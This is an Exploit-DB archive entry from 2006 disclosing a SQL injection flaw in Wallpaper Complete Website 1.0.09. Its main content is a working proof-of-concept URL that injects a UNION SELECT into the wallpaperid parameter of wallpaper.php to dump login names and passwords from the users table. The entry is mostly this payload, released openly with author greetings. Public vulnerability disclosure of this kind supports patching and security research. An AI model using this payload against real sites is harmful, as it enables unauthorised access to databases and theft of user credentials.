Wallpaper Complete Website 1.0.09 - SQL Injection

EDB-ID:

2835


Author:

GregStar

Type:

webapps


Platform:

PHP

Date:

2006-11-23


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

*************************************************************************************************************************#
                                                              					          		 #
			               			 Coding 4 Fun     						 #	
			                                      						  		 #
*************************************************************************************************************************#
													  		 #
* Wallpaper Complete Website  1.0.09  (http://www.easysitenetwork.com/modules.php?name=Content&pa=showpage&pid=7) ; 	 #
													  		 #	
* Class = SQL Injection ;										  		 #
   													  		 #
* Download = http://www.easysitenetwork.com/modules.php?name=Downloads&d_op=getit&lid=8 ;				 #
													  		 #
* Found by = GregStar (gregstar[at]c4f[dot]pl) (http://c4f.pl) ;				          		 #
												  	  		 #
-------------------------------------------------------------------------------------------------------------------------#
													  		 #
													  		 #
- PoC:												          		 #
													  		 #
http://[target]/[path]/wallpaper.php?wallpaperid=1%20UNION%20SELECT%20login,0,0,0,0,password%20FROM%20users%20/* 	 #
															 #
															 #
*************************************************************************************************************************#													  				
Gr33tz:  sASAn,marcel3miasto,masS,kaziq,Abi,kociaq,SlashBeast,chochlik,rfl,d3m0n,java,reyw,kw@ch.	  		 #
												          		 #
*************************************************************************************************************************#

# milw0rm.com [2006-11-23]